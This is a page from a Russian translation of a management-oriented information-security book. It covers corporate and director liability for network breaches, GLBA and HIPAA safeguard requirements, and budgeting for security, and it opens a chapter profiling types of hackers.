WWW.DISSERS.RU

БЕСПЛАТНАЯ ЭЛЕКТРОННАЯ БИБЛИОТЕКА

   Добро пожаловать!

Pages:     | 1 |   ...   | 2 | 3 || 5 |

«• Файл взят с сайта • • • где есть ещё множество интересных и редких книг. ...»

-- [ Страница 4 ] --

Оглядываясь назад: что будет дальше? Руководство компании обнаружило эту проблему тогда, когда один из ее международных веб-серверов был взломан. Хакер исказил внешний вид веб-сайта и подорвал обществен­ ную репутацию Costa Corp. Получилось так, что проблема оказалась гораздо большей, чем просто неправильное подключение веб-сервера к Интернету. Расследование, прове­ денное группой обеспечения безопасности Costa Corp, показало, что через серверы компа­ нии к Интернету было подключено более 400 систем. Группа безопасности не знала, кто подключил эти системы или кто ими владел. У многих систем не было настроек безопас­ ности, поэтому их легко было взломать из Интернета.

Даже если сотрудники компании проигнорировали ее политики и подключили незащи­ щенные веб-серверы к Интернету, компания все равно остается ответственной за эти сис­ темы, которые могут быть использованы для запуска атак против других компаний. Атаки из систем таких беспечных владельцев происходят каждый день. Хакеры используют сот­ ни и тысячи скомпрометированных систем для запуска атак против других систем и сетей.

Не так давно при помощи атак по типу «отказа от обслуживания» были обрушены не­ сколько высокопрофессиональных сайтов, таких, как сайты Yahoo, Inc. и EBay, Inc. В этих атаках серверы или сети «наводняются» бесполезным трафиком, и законные пользователи больше не могут получать доступа к их ресурсам. Подобные атаки все еще представляют значительную угрозу безопасности. Такие атаки демонстрируют, как хакеры могут ис­ пользовать ваши машины для нападения на другие системы и сети.

Два года назад тинейджером, проживающим в Модесто, штат Калифорния, была предпри­ нята атака, которая не получила широкой огласки. Он получил доступ к системам регу­ лирования слива воды одной из канадских плотин. Правоохранительные органы успели его поймать до того, как он успел что-либо наделать, но что было бы, если им не удалось его схватить?

Представьте себе, что этот тинейджер, взломавший незащищенный веб-сервер, принадле­ жавший компании Fortune 500, и получивший доступ к системе слива канадской плотины, открыл бы ее и затопил населенные пункты ниже плотины, вызвав ущерб в миллионы долларов и гибель 300 жителей. Позвольте теперь сказать, что? хотя правоохранительные органы и не всегда могут определить след, ведущий к такому тинейджеру, они все же спо­ собны выйти на след компании Fortune 500, которой принадлежит этот веб-сервер, ис­ пользовавшийся для запуска атаки. При этом можно было бы задать такие вопросы:

1. Почему системы компании Fortune 500 оставались незащищенными и бескон­ трольными, вследствие чего их можно было бы использовать для атаки против ка­ надской плотины?

2. Почему канадская плотина была подключена к Интернету так, что взломщик мог бы, в конце концов, получить неавторизованный доступ к ее системе управления сливом?

3. Кто должен был бы понести ответственность за возможные последствия?

4. Являетесь ли вы членом правления или руководителем высшего уровня компании Fortune 500?

5. Понимает ли ваша команда юристов, что такое безопасность?

Сегодня незащищенные системы повсюду используются для атак на любые цели. Вашей обязанностью как руководителя является не допустить, чтобы эти системы оказались ва­ шими. Также нельзя допускать атак, исходящих из сети партнера, которые могут быть приписаны вам. Убедитесь, что у вас имеются все надлежащие средства безопасности для обнаружения атаки и защиты сети. Директоры и должностные лица по закону должны 134 Юридические обязанности по защите информации и сетей охранять информационные фонды корпораций. В случае, если нарушение безопасности сети причиняет вред, владеющая ей организация и ее руководители могут подвергнуться судебному преследованию. Сегодня уже имеются реальные судебные дела.

В следующем разделе главы Дэн Дж. Лэнджин, юрист из Канзаса, обсуждает реальные правовые действия, связанные с ответственностью руководителей и нарушениями в обес­ печении безопасности сетей.

Юридические обязанности по защите информации и сетей Хотя гипотетическая ситуация с канадской плотиной покажется вам довольно необычной, возможность поиска виновных может оказаться не столь притянутой за уши. Когда вред личности причинен неустановленными третьими лицами (или неподсудными, например, не­ платежеспособными лицами), то суд распространяет ответственность на другого, более пла­ тежеспособного, ответчика, чьи действия или бездействие сделали возможным причинение вреда потерпевшему этими третьими лицами с использованием имущества, принадлежащего ответчику. Первыми подобными случаями в судебной практике являются дела в отношении владельцев помещений. В этих случаях жертвы ограблений, хулиганства и других преступле­ ний, совершенных в мотелях, квартирах или универмагах, подали иски на владельцев и ме­ неджеров этих помещений за то, что они не обеспечили должную безопасность или не преду­ предили потерпевших о рисках, которым они подвергались, входя в эти помещения. В этих судебных процессах истцы преследуют представителей делового мира, чьи карманы значи­ тельно глубже и которых легче найти, чем преступника, совершившего преступление в отно­ шении истцов. Общим аргументом на таких процессах для подтверждения судебной ответст­ венности предпринимателей являлось то, что они были обязаны предотвратить причинение истцу вреда, так как присутствие преступников (и возможного вреда для потерпевшего) было предсказуемым.

Приведенные ниже примеры (процессы Exigent и С. I. Host) показывают, что истцы уже возбу­ ждали иски против третьих сторон, чьи сети, после того как были скомпрометированы, были использованы для запуска атак против потерпевших. К сожалению, в сложившейся после 11 сентября ситуации вопрос «предсказуемости» приобрел новый смысл. В статье в New York Law Journal приводится большой перечень юридических лиц, против которых потерпевшие могут возбуждать иски, связанные с атаками террористов 11 сентября, при условии, если они отказались от своих прав на возмещение ущерба из Фонда компенсации жертвам 11 сентября th 2001 года (September 11 Victim Compensation Fund of 2001):

«Возможными ответчиками являются American Airlines и United Airlines и различные ком­ пании и организации, которые участвовали в обеспечении безопасности угнанных само­ летов, компании Argenbright, Globe Aviation Services, Huntleigh USA Corp., Massport, адми­ нистрация портов New York и New Jersey (которые приказали некоторым из сотрудников башен-близнецов вернуться за свои рабочие столы), администрация аэропортов New Jer­ sey и Metropolitan Washington и правительство США за действия службы управления воз­ душным движением) ».

Как замечает автор данной статьи, даже в создаваемых законом о фонде компенсации ус­ ловиях неопределенности исхода процесса для истца при преследовании этих ответчи­ ков, на время написания статьи был уже возбужден, по меньшей мере, один процесс про­ тив United Airlines.

2. Kreindler, "Pros and Cons of Victims Funds", New York Law Journal, November 28,2001.

3. Kreindler, "Pros and Cons of Victims Funds", New York Law Journal, November 28, 2001.

4. Дело Mariani против United Airlines, Inc., зарегистрировано в окружном суде США по южному округу Нью Йорка. Прим. Автора.

Оглядываясь назад: что будет дальше? С позиции предсказуемости атаки хакеров (количество которых увеличивается с каждым годом) «дыры» в информационной безопасности могут вызывать для корпораций серьез­ ные правовые проблемы, касающиеся претензий к третьей стороне, в результате действия или бездействия которой к ответственности могут быть привлечены директор или другое должностное лицо. Иски к третьей стороне могут подаваться на основании нарушений условий контрактов, нарушений законодательных актов, предписывающих принятие мер по защите информации, или на основании правовых понятий, таких, как халатность. Взы­ скание в полном объеме убытков по таким искам с третьей стороны (или прямых убытков имуществу компаний, если иски к третьей стороне не будут удовлетворены) может приво­ дить к искам против должностных лиц и директоров компаний за невыполнение своих обязанностей, доверенных им корпорацией или акционерами.

Процессы, возбуждаемые из-за нарушений условий контракта, вероятнее всего, будут опираться на пункты контрактов, предусматривающие соблюдение конфиденциальности и обеспечение безопасности информации, которую компания получает от другой стороны, то есть клиента, поставщика или партнера по бизнесу. В действительности, все соглаше­ ния по оказанию услуг, поставок программного обеспечения, экономическому объедине­ нию, совместным предприятиям и по неразглашению информации содержат пункты, ка­ сающиеся соблюдения конфиденциальности. Эти пункты требуют от каждой стороны за­ щищать совместно используемую информацию и оговаривают, что в случае несоблюде­ ния этого условия одной из сторон другая сторона освобождается от ответственности за убытки, причиненные таким нарушением договора. Если неразборчивая в средствах тре­ тья сторона получит доступ к конфиденциальной информации другой стороны, передан­ ной стороне-получателю, то сторона-получатель, хранящая информацию в электронном виде и не обеспечившая ее должную защиту, несет за это ответственность. Например, если компания А передает секретную формулу или проект компании В по соглашению о совме­ стном предприятии, в котором содержится пункт о конфиденциальности, то компания В несет ответственность перед компанией А в случае, если третья сторона взломает сеть компании В и обнаружит (или украдет) секретную формулу или проект компании А.

Хотя такие пункты контрактов были изобретены еще в дни, когда конфиденциальная ин­ формация передавалась в бумажном виде и хранилась в запертых шкафах, они важны и для наших дней, когда все больше конфиденциальной информации предается и хранится в электронном виде. В условиях, когда электронный «взлом» может быть сделан более скрытно и требовать меньше усилий, чем взлом физический, сегодня записи с конфиден­ циальной информацией подвергаются большему риску, чем в прошлом.

Другими обстоятельствами, при которых нарушение безопасности может быть причиной привлечения к ответственности за нарушение условий контракта, могут быть ситуации предоставления услуг хостинга, или совместного размещения информации. При этом кон­ тракт с компанией, предоставляющей хостинг, предусматривает обеспечение определен­ ного уровня безопасности (даже если он назван «приемлемым уровнем безопасности»).

Такие пункты контракта встречаются все чаще, так как хостинговые компании пытаются выделить себя на рынке, предлагая заключить соглашение об уровне услуг, то есть о пре­ доставлении «безопасного хостинга».

Второе вероятное основание для привлечения к ответственности создают многочисленные новые федеральные акты, требующие от компаний обеспечивать приемлемые меры безопас­ ности для существенной конфиденциальной информации, как, например, в области здраво­ охранения и финансовых услуг. Акт о пересылке и учете информации страхования здоровья HIPAA (Health Insurance Portability and Accountability Act), Акт Грэмма-Лича-Блайли GLBA (Gramm-Leach-Bliley Act) и другие федеральные акты требуют от компаний применять уси­ ленные меры защиты существенной конфиденциальной информации. Правила безопасно 136 Юридические обязанности по защите информации и сетей ста (Security Regulations) в HIPAA требуют от всех участвующих сторон (провайдеров меди­ цинских услуг- Health Care Providers, планировщиков страхования здоровья - Health Plans и посредников в области здравоохранения-Health Care Clearinghouses) обеспечивать безопас­ ность закрытой информации о состоянии здоровья (названной Protected Health Information, или PHI) внедрением у себя «четырехугольной» модели безопасности ("four-corner" security model). Эта модель включает административные меры безопасности, физические меры безо­ пасности, технические сервисы безопасности и технические механизмы безопасности. Акт GLBA касается финансовой информации клиентов, получаемой финансовыми учреждения­ ми и хранящейся ими (как, например, банками, сберегательными и кредитными организа­ циями). Акт GLBA и вводимые им правила («Межведомственные правила, устанавли­ вающие стандарты по охране информации о потребителях» - "Interagency Guidelines Estab­ lishing Standards for Safeguarding Customer Information, или просто «Правила» - "Guide­ lines") содержат стандарты по мерам безопасности, названные «мерами безопасности для финансовых учреждений» ("financial institution safeguards"). Раздел Ш.С.1 «Правил» уста­ навливает, что учреждения, на которые правила распространяются, должны предусматри­ вать следующие меры безопасности для финансовой информации клиентов:

a) контроль доступа к системам с информацией клиентов;

b) ограничение доступа к местам физического размещения информации клиентов;

c) шифрование электронной информации клиентов;

d) процедуры, обеспечивающие отсутствие влияния модификации систем на безопас­ ность;

e) процедуры двойного контроля, разделение обязанностей и личные проверки персо­ нала ;

f) системы обнаружения реальных атак на системы с информацией клиентов или их взлома;

g) программы реагирования, определяющие действия при неавторизованном доступе;

h) защиту от физического уничтожения или повреждения информации клиентов.

Третьим возможным основанием для привлечения к ответственности являются правовые понятия, такие, как халатность. Исходя из правовых понятий, таких, как ответственность за качество продукции или ответственность владельцев помещений, сторона может быть привлечена к ответственности на основании того, что ее продукция или помещения были использованы другой стороной для причинения вреда третьей стороне. Многие из таких правовых понятий становятся правовыми нормами (прецедентами) после того, как суды установят устойчивый характер вреда - например, причинами распространенности ответ­ ственности за качество продукции являются промышленная революция и недоброкачест­ венно спроектированная продукция. Если из этих исторических событий будет сделан вы­ вод, то суды начнут использовать прецедент, заключающийся в том, что сторона может быть привлечена к ответственности за вред, причиненный системам другой стороны вследствие неспособности первой стороны поддерживать надлежащую безопасность ин­ формации.

Действительно, такие дела уже ведутся в судах. Exigent (компания по разработке про­ граммного обеспечения) подала иск в Европе против немецкого университета и шведской хостинговой компании после того, как хакер взломал сеть Exigent и украл конфиденциаль­ ный исходный код, используя для этого учетную запись в немецком университете и систе 5. 42 CFR 142.306 (Свод федеральных актов США. - Примеч. пер.) 6. Опубликовано в Federal Register, Vol. 66, No. 22, February 1,2001, pp. 8616-8641.

7. Employee background checks - проверки «лояльности» сотрудников. - Примеч. пер.

Оглядываясь назад: что будет дальше? мы Интернет-провайдера. В США, техасская компания C.I. Host подала иск на компанию Exodus, серверы которой были использованы для запуска нескольких атак по типу «отказ от обслуживания» против C.I. Host. Журналист, комментирующий этот процесс, удачно подметил, какое воздействие оказало дело против Exodus на эти компании :

«Юристы C.I. Host убедили судью из Техаса выдать предписание на временное ограниче­ ние, предусматривающее отключение трех веб-серверов, участвовавших в атаке, до тех пор, пока обе компании не убедятся, что уязвимые места закрыты. В этом запутанном и темном деле были стравлены не соперник с соперником, а жертва с жертвой. Хотя атаки продолжа­ лись только пару дней, чтобы закрыть это дело потребовалось семь месяцев высокооплачи­ ваемого труда юристов, не говоря уже о затраченных времени и энергии.

Этот и другие подобные ему случаи, вероятно, будут возникать все чаще по мере того, как компании будут страдать от отключения их от пользователей и кражи информации, вызываемых «дырами» в безопасности.» (курсив автора).

В том случае, если на компанию подан иск на основании одного или более таких преце­ дентов или если компания сама понесла внутренние убытки от бреши в безопасности (простои, кража интеллектуальной собственности и т. д.), то должностные лица компании или директоры могут быть привлечены к ответственности за невыполнение возложенных на них обязанностей. В соответствии с этими обязанностями перед компанией и акцио­ нерами директоры и должностные лица должны защищать имущество компании. Ученые юристы предложили, чтобы должностные лица и директоры защищали информационные фонды компаний в той же степени, как и физическое имущество:

«Главная обязанность [по обеспечению безопасности информации] лежит на руково­ дстве, и неспособность добросовестно выполнять эту обязанность может приводить к персональной ответственности должностных лиц и директоров. Стандартом для юридического заключения может стать «должное старание» ("due diligence"): его нужно проявлять при обеспечении безопасности компании в такой же степени, как и при по­ купке самой компании.» (курсив автора). —Esther Roditti, Computer Contracts, Sec.

15:03[1], стр. 15-25 (Matthew Bender, 1999).

Обязанности по защите информационных фондов закрепляются законодательно в возрас­ тающих по количеству федеральных актах. Раздел III.А «Правил» GLBA требует от совета директоров принятия политики безопасности для их организации, а затем и: «... надзора за разработкой, осуществлением и поддержкой программы обеспечения безопасности ин­ формации банка, при этом руководство должно определять конкретные обязанности по ее осуществлению и рассматривать предоставленные менеджерами отчеты».

В соответствии с Разделом III.F «Правил» совет директоров после первоначального утвержде­ ния должен затем ежегодно пересматривать программу обеспечения безопасности.

Хотя некоторые из финансовых учреждений попросили федеральные органы убрать из «Правил» пункты, касающиеся ответственности совета директоров, им было в этом отка­ зано. В официальном комментарии к «Правилам» разъясняется, почему федеральные органы потребовали ответственности совета директоров за обеспечение информационной безопасности:

8. Computer Security Institute, 2001 CSI/FBI Computer Crime and Security Survey at p. 7, 9. "See You In Court," CIO Magazine at p. 62 (November 1,2001).

!0. См., например, «Правила» (Guidelines), утвержденные Office of Comptroller of the Currency, at 12 CFR I, Appendix В to Part 30.

11. См., например, «Правила» (Guidelines), утвержденные Office of Comptroller of the Currency, at 12 CFR I, Appendix В to Part 30.

138 Юридические обязанности по защите информации и сетей «Некоторые комментаторы заявляют, что каждое финансовое учреждение должно иметь право решать самостоятельно, в каких случаях эта программа должна утверждаться сове­ том директоров... Другие же предлагают изменить «Правила» так, чтобы от совета дирек­ торов требовалось принятие только первоначальной программы информационной безо­ пасности с делегированием последующих пересмотра и принятия программы комитету или одному лицу. Федеральные органы полагают, что общая программа информационной безопасности финансового учреждения очень важна для безопасности и финансовой ус­ тойчивости организаций. Исходя из этого, «Правила» в окончательном их виде продол­ жают возлагать ответственность за принятие и осуществление надзора за выполнени­ ем этой программы на советы директоров организаций)) (курсив автора).

Здесь уместно спросить, каким образом должностные лица и директора должны выпол­ нять свои обязанности по защите информационных фондов. Основой этих обязанностей является принцип благоразумия (prudent man rule), который требует от должностных лиц и директоров, подобно обычному благоразумному человеку, обязанному блюсти интересы компании, действовать по обстоятельствам и таким способом, который бы наилучшим образом соответствовал интересам компании и акционеров.

Должностные лица и директоры не могут, в соответствии с принципом благоразумия, пол­ ностью делегировать обязанности по обеспечению информационной безопасности дирек­ тору по информационным технологиям или отделу информационных систем. Ученые юристы, анализировавшие обязанности должностных лиц и директоров в условиях по­ следней большой угрозы информационным технологиям (Y2K), заявляли, что «должност­ ные лица и директоры должны будут сделать больше, чем просто положиться на план, со­ ставленный их директорами по информационным технологиям» (Scott & Reid, The Year 2000 Computer Crisis, Sec. 6.05, на стр. 6-59). Вместо этого, как указывается в официаль­ ном комментарии к «Правилам» GLBA, руководители были обязаны утвердить программу и осуществить общий надзор за ее выполнением. Делегирование может создать ситуацию, в которой руководство будет считать, что отдел информационных систем самостоятельно примет решение по обеспечению информационной безопасности от имени компании, а отдел информационных систем будет ждать указаний от руководства. Это может вызвать «аналитический паралич» ("paralysis by analysis"), при котором политики информацион­ ной безопасности никогда не будут утверждены.

В прошлых обзорах по вопросам безопасности было показано, что руководство может пред­ принимать действия по уменьшению риска от бреши в системе безопасности. В соответствии с обзором «2000 Security Industry Survey» журнала Information Security компании, имеющие политики информационной безопасности, с большей вероятностью могут обнаруживать ата­ ки и реагировать на них: примерно 66 процентов компаний, имеющих политики, смогли об­ наружить атаки и отреагировать на них, но без таких политик это смог сделать только 21 про­ цент компаний. Обзор того же журнала «2001 Security Industry Survey» показал, что главным препятствием для улучшения информационной безопасности являются «бюджетные затруд­ нения» (в первую очередь связанные с «недостаточным обучением/подготовленностью ко­ нечного пользователя»)13. Обе эти проблемы традиционно относят к обязанностям руково­ дства. Для акционеров, правительственных органов или частных сторон судебного процесса проблема, заключающаяся в наличии в компании утвержденных надлежащих мер безопасно­ сти, будет решена уравновешенным мнением суда.

12. См. "Interagency Guidelines Establishing Standards for Safeguarding Customer Information and Rescission of Year 2000 Standards for Safety and Soundness", Part III, опубликовано в Federal Register, Vol. 66, No. 22, February 1, 2001, at p. 8620.

13. "2001 Security Industry Survey," Information Security magazine, at p. 44 (October 2001).

Оглядываясь назад: что будет дальше? Деловые инициативы и корпоративные цели Из обзора Дэна Лэнджина в предыдущем разделе становится ясным, что против компании, неспособной обеспечить безопасность, могут быть предприняты меры правового воздейст­ вия. Но даже когда над головой нависает угроза судебного преследования, безопасность час­ то откладывается на более позднее время - после того, как сеть будет установлена, после то­ го, как будет создана база данных, после того, как будет разработано программное обеспече­ ние, после того, как серьезная атака нанесет ущерб. И после того, как защита не сработает, основные препятствия для создания защиты обычно связывают с ролью руководства, не обеспечившего, например, должного финансирования, обучения и разработки политик.

Руководители часто перекладывают ответственность за безопасность систем на систем­ ных администраторов, не обеспечив соответствующего финансирования установки средств, обеспечивающих безопасность и техническую поддержку сети. Так как безопас­ ность не предусматривается изначально, то некоторые руководители думают, что расходы на нее можно просто не включать в бюджет, и безопасность становится постоянно отодви­ гаемой задачей. Например, руководители могут отложить установку программ-детек­ торов вторжения на следующий квартал. Перед тем как вы об этом узнаете, закончится год, и директор по информационным технологиям, принявший такое решение, уйдет из компании. А новый директор по информационным технологиям отложит приобретение программ-детекторов еще на шесть месяцев.

Безопасность будет наиболее эффективной тогда, когда она будет связана: 1) с деловыми инициативами и 2) с корпоративной целью. Во-первых, компания Costa Corp не сделала внедрение программ по обнаружению вторжения необходимой составной частью своей инициативы по электронной коммерции. Когда затраты на осуществление этой инициати­ вы превысили возможности бюджета, то руководство решило забрать средства из другого проекта. Руководство решило отложить покупку программ-детекторов вторжения, ко­ торая была предусмотрена бюджетом, была утверждена и прошла оценочное тестирова­ ние группой обеспечения безопасности. Вместо этого средства были направлены в бюд­ жет электронной коммерции. Приобретение программного обеспечения по обнаружению вторжения, необходимого для защиты компании, было отложено.

Когда средства обеспечения безопасности поддерживают деловую инициативу, то высшие руководители их обычно финансируют. Если бы им было показано, что программное обеспечение по обнаружению вторжения можно наращивать, что оно имеет возможность быстрого обнаружения как известных, так и неизвестных угроз и поддерживает деловую инициативу электронной коммерции то его покупка могла бы быть профинансирована.

Более того, можно было бы начать переговоры о корпоративной лицензии (site license) для защиты всей инфраструктуры компании.

Во-вторых, вы сможете добиться финансирования безопасности, связав ее с корпоратив­ ной целью по обеспечению безопасности. Примером такой цели может быть обеспечение целостности информации. Компания, целью которой является обеспечение целостности своей информации, демонстрирует твердое стремление руководства к безопасности.

Сотруднику службы безопасности, системному администратору или менеджеру, не сумев­ шим найти способ связать свою инициативу по обеспечению безопасности с корпоратив­ ной целью, будет затем трудно оправдать бюджетные требования и выстоять в борьбе с другими инициативами в области информационных технологий. К сожалению, во мно­ гих компаниях не удается обозначить безопасность как корпоративную цель. В условиях возрастания количества и изощренности атак в недалеком будущем такие компании могут оказаться легкой добычей при открытии сезона охоты на них.

14. Лицензия на применение средств всеми сотрудниками компании. - Примеч. пер.

140 Угрозы требуют действий Угрозы требуют действий Сценарий атаки на канадскую плотину, о котором уже было рассказано, может показаться немного надуманным. Однако заглянем в репортаж в Washington Post за 27 августа 2002 года, в котором говорится, что войска США в Афганистане в январе того же года за­ хватили компьютеры Аль-Кайды. В одном из них содержались компьютерная модель пло­ тины и программное обеспечение, позволяющие моделировать ее катастрофическое разрушение при подготовке террористического акта. В ходе расследований, проведенных американскими специалистами, появились свидетельства того, что члены Аль-Кайды про­ водят время на веб-сайтах, которые содержат программы и команды для переключателей с цифровым управлением, расположенных в сетях электроснабжения, водоснабжения, транспортных сетях и сетях связи, о чем сообщалось также в Post. Атаки на инфраструк­ туру США вполне возможны, и если они будут успешными, то вызовут общенациональ­ ную катастрофу. Об атаке такого вида сообщалось в июне 2001 года, когда хакер пришел из сети, управляемой компанией Chinese Telecom, и преодолел защиту учебной сети, при­ надлежавшей компании California Independent Systems Operator (Cal-ISO), которая контро­ лирует всю сеть электроснабжения штата. Очевидно, что подобные угрозы реальны.

Действия организации против таких угроз могут потребовать свежего взгляда на имеющиеся у нее политики, процедуры и средства защиты с целью определить их соот­ ветствие правилам, установленным для ее отрасли.

Например, соответствуют ли они следующим документам:

1. Стандарт ISO 17799. Впервые опубликованный в 1995 году стандарт BS7799 стал так широко использоваться во многих странах в законодательной практике по ин­ формационной безопасности, что был переработан в международный стандарт ISO 17799.

2. Акт Грэма-Лича-Блайли (GLB - Gram Leach Bliiey Act). GLB является федераль­ ным законом, требующим от финансовых учреждений защищать индивидуальную финансовую информацию от утраты и кражи. GLB требует от федеральных орга­ нов, регулирующих деятельность финансовых учреждений (таких как Управление контролера денежного обращения, Совет управляющих федеральной резервной системы, Федеральная корпорация страхования депозитов и Управление по над­ зору за сберегательными ассоциациями)' создания правовых стандартов для за­ щиты этой финансовой информации.

3 Акт о сохранении тайны и защите информации о состоянии здоровья (НIРРА Health Information Privacy and Protection Act). HIPPA определяет защиту персо­ нальной информации о состоянии здоровья. В нем установлены правила обеспече­ ния безопасности информации о состоянии здоровья, которая передается или хранится в электронном виде. Хотя этот акт находится на стадии разработки, но, вероятно, что черновой вариант останется окончательным. Затем учреждения, на которые он распространяется, должны будут в течение двух или трех лет (в зависи­ мости от своих размеров) его выполнить.

Компания Costa Corp имела хорошие намерения, но ее руководители, борясь с ограничен­ ностью ресурсов и времени и осуществляя другие деловые инициативы, не смогли выяс­ нить угрозы своей организации, научиться, как уменьшить риски, и принять меры по 15. Office of Controller of the Currency (OCC), Board of Governors of the Federal Reserve System, Federal Deposit Insur­ ance Corporation (FD1C) и Office of Thrift Supervision. - Примеч. пер.

16. Автор приводит расшифровку сокращения;

Health Insurance Portability and Accountability, для которого подходит сокращение HIPAA и которое я перевел как Акт о пересылке и учете информации о страховании здоровья. Об этом документе говорится выше. - Примеч. пер.

Оглядываясь назад: что будет дальше? уменьшению этих рисков. Они делегировали вопросы безопасности, устранив должност­ ных лиц, директоров и высшее руководство из процесса принятия решений. Как ранее заметил юрист Дэн Лэнджин, исходя из «принципа благоразумия», должностные лица и директоры не могут полностью делегировать свои обязанности по обеспечению ин­ формационной безопасности. Недостаточно просто заявить: «У меня есть отдел, который заботится об обеспечении безопасности».

Угрозы возрастают, и атаки становятся более изощренными. Действия против известных и неизвестных угроз требуют большего, чем благие намерения руководства, - они требуют решимости, финансирования, активности и людей, которые бы понимали, что такое безо­ пасность, и принимали правильные решения.

Многие виды денежного вознаграждения руководителей связываются с выполнением ими деловых инициатив и достижением ими корпоративных целей. Добейтесь, чтобы в вашей компании обеспечение безопасности стало одной из корпоративных целей. Выясните, что могут сделать для повышения безопасности отраслевые стандарты и как они должны вне­ дряться в вашу среду. Используйте рычаги деловых инициатив, включив в них с самого начала вопросы безопасности, и не делегируйте обязанности по обеспечению безопасно­ сти. Мы на войне - враг уже у ворот вашей сети. Не стойте на месте, иначе вам придется участвовать в каком-либо запутанном судебном процессе из-за того, что ваше руководство не приняло достаточных мер по защите вашей компании или не принимало их вообще.

Глава Прогулка хакера по сети Просить сетевого администратора обеспечить безопасность сети, когда он не имеет возможности контролировать ее работу, - это то же самое, как про­ сить механика починить двигатель, не открывая капот машины.

Маркус Ранум, основатель Network Flight Recorder Представьте себе, что вы в составе совета директоров замечательной компании, входящей в список Fortune 500. (Неплохая мечта, не так ли?) Утром в понедельник вы зашли в люби­ мое кафе и приступили к просмотру утренних газет, наслаждаясь первой на этой неделе чашкой ароматного кофе. Но подождите. Читая приятную заметку, предлагающую провес­ ти отпуск на французской Ривьере, вы видите броский заголовок: «Фирма из Fortune разорена хакером!» Увы, это не какая-то другая фирма из Fortune 500, а именно ваша!

Статья сообщает, что ваша компания была вынуждена отключить свою интранет от внеш­ него доступа в попытке прекратить вредительство хакера в отношении продуктов нового ряда. Еще пять минут назад вы неторопливо подсчитывали в уме, сколько вам нужно про­ дать ваших акций, чтобы обеспечить себе веселый отпуск. Теперь вам приходится думать о том, на сколько ваши акции упадут в цене (не сомневаясь в этом!) после того, как лидеры рынка закончат просматривать заголовки газет. Более того, вы опасаетесь, не были ли украдены или уничтожены программы для продуктов нового ряда. Переживет ли это ком­ пания? А может быть, вам придется провести этот отпуск, обновляя свое резюме?

Звучит немного неправдоподобно? Вовсе нет. Информационные системы непрерывно кто-то атакует. Вторгаются внутренние пользователи и внешние пользователи, вторгаются конкуренты, террористы - можно встретить кого угодно. Подобное же разнообразие на­ блюдается и в механизмах атак. В исследовании CSI в 2002 году было обнаружено, что це­ лями атак могут быть «отказ от обслуживания», имитация законных пользователей (spoof­ ing), информационное вредительство и кража информации. Компании подвергаются напа­ дению со всех сторон: внешние нарушители, внутренние нарушители и несколько проме­ жуточных типов нарушителей: бывшие консультанты, обиженные служащие и т. д.

Для вас занятно знакомиться со статистическими данными, потому что они всегда касают­ ся проблем, возникающих в чужих сетях. Однако и ваша сеть уязвима ничуть не меньше.

Если в вашей сети нет надлежащих механизмов предотвращения и обнаружения взлома и контроля систем, то вполне вероятно, что вы уже сейчас подвергаетесь атаке и не знаете об этом.

Я добавила к книге эту главу для того, чтобы показать, какому риску подвергается ин­ формация после того, как хакер вошел только в одну систему сети компании. В главе не го­ ворится о том, как производится сам взлом компьютерных систем. К сожалению, уже су­ ществует более чем достаточно источников, из которых можно эту информацию получить.

В главе показано, как хакер проходит по сети в поиске информации после того, как он уже зашел в сеть. Также показано, как он находит доступ к другим системам и как собирает пароли.

Прогулка хакера по сети Краткая характеристика хакеров Многие люди все еще имеют странные представления о хакерах. Типичный хакер, по их мне­ нию, - это молодой, необычайно яркий и патологически асоциальный мужчина. Часто он одержим манией - работает всю ночь над своими новейшими блестящими инструментами.

Кончено, чтобы подчеркнуть его одержимость, к этому добавляют непрерывное курение, пи­ тание всухомятку и поддержание сил сомнительными медицинскими препаратами.

Вернитесь в действительность! Подлинный хакер, скорее всего, окажется разочаровав­ шимся бухгалтером, мелким бюрократом или недавно уволенным оператором ввода дан­ ных. Несмотря на наличие у него технических познаний, его, возможно, выгнали из сред­ ней школы. В противоположность распространенному мифу о его яркой личности прав­ дой является то, что стать хакером не так уж трудно. Мы все наслышаны о детях, взламы­ вавших компьютеры в 1970-х годах. Но кто слышал о том, что кто-то из них поступил в Гарвард или Массачусетский технологический институт?

Кстати, мы забыли об ужасно обиженных программистах, борющихся с огромной неспра­ ведливостью внутри компании. Этот голливудский образ хакера порядком надоел и имеет мало общего с реальностью. Часто реальная жизнь оказывается не такой захватывающей.

Реальные хакеры Теперь, когда вы знаете, как не должен выглядеть хакер, вам должно быть любопытно, как он должен выглядеть. На самом деле большинство хакеров выглядит совсем как вы или я или женщина из соседнего офиса.

Только для краткого знакомства рассмотрим наиболее распространенные типы хакеров.

Неуловимый хакер № 1: Рассерженный сотрудник Такого хакера трудно поймать, и такой тип наиболее распространен. Возможно, он работал в вашей компании недолго, а может быть, и несколько лет. Также вероятно, что его недавно уволили или понизили в должности. Его техническая квалификация может колебаться от про­ стого ввода данных до системного анализа. Он мог оставить «черный ход» в систему, с ко­ торой недавно работал. Или же он просто имеет легкий доступ к вашей сети из-за того, что его работа заключалась в обновлении и поддержке информации ограниченного пользования.

В любом случае у вас, возможно, не будет никаких причин его подозревать.

Неуловимый хакер № 2: Промышленный шпион В отличие от голливудского образа, большинство шпионов не выглядят в действительности как Джеймс Бонд. Скорее всего, они похожи на бухгалтера, работающего у вашего отца, или на президента вашей местной торговой палаты. Хакер этого типа имеет глубочайшие позна­ ния в вашей отрасли. Он может работать на конкурирующую компанию - или даже на кон­ курирующую страну. (Многие промышленные шпионы работают с молчаливого одобрения своих правительств. Некоторые из них даже находятся на службе у таких правительств.) Он может также быть одним из ваших сотрудников, замышляющим «пересесть на другой корабль» или ожидающим массового увольнения. Может быть, он за счет этого пытается «поднять свою рыночную цену» перед тем, как перейти на эту призрачную должность.

Неуловимый хакер № 3: Одинокий «социопат» Таких не так уж много. Такой тип хакера наиболее близок к вашим представлениям.

Он молод, ярок и, вероятнее всего, является либо студентом, либо недавним выпускни­ ком, еще не нашедшим направления своей деятельности. Однако на такого хакера вы, скорее всего, не наткнетесь в потемках вашей базы данных.

Прогулка с хакером Неуловимый хакер № 4: «Хактивист» Это новейшая и наиболее пугающая категория компьютерных преступников. «Хактивист» считает себя политическим деятелем, реформатором и даже воином. Некоторые доходят до того, что приравнивают себя к террористическим группам и берут клички «кибер-джихад», «Джи-Форс Пакистан» и «Доктор Нукер» (cyber-jihad, G-Force Pakistan, Doktor Nuker). Дру­ гие преследуют необычные политические цели, используя логику не менее бестолковую и запутанную, чем у «Унабомбера», Более часто в такую категорию попадает молодой че­ ловек, имеющий тесные связи с политически нестабильными регионами, например с Ближ­ ним Востоком или Восточной Европой. В основном являясь яркими личностями, многие из таких хакеров действительно обучились компьютерному искусству в Соединенных Штатах.

